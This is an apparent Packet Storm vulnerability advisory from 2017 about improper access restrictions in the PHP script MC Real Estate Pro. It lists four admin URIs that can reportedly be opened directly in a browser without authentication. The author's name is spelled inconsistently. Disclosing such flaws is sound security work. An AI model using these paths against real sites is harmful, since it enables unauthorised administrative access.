MC Real Estate Pro Insecure Direct Object Reference

2017-01-15T00:00:00
ID PACKETSTORM:140500
Type packetstorm
Reporter Ihsan Sencan
Modified 2017-01-15T00:00:00

Description

                                        
                                            `# # # # #   
# Vulnerability: Improper Access Restrictions   
# Date: 15.01.2017  
# Vendor Homepage: http://microcode.ws/  
# Script Name: MC Real Estate Pro  
# Script Buy Now: http://microcode.ws/product/mc-real-estate-pro-php-script/3858  
# Author: Adeghsan Aencan  
# Author Web: http://ihsan.net  
# Mail : ihsan[beygir]ihsan[nokta]net  
# # # # #   
# Direct entrance..  
# An attacker can exploit this issue via a browser.  
# The following example URIs are available:  
# http://localhost/[PATH]/admin/AddPropertyType/apt  
# http://localhost/[PATH]/admin/AddNewState/Add_State  
# http://localhost/[PATH]/admin/AddNewCity/Add_City  
# http://localhost/[PATH]/admin/SliderTable/st  
# Vs.......  
# # # # #  
  
`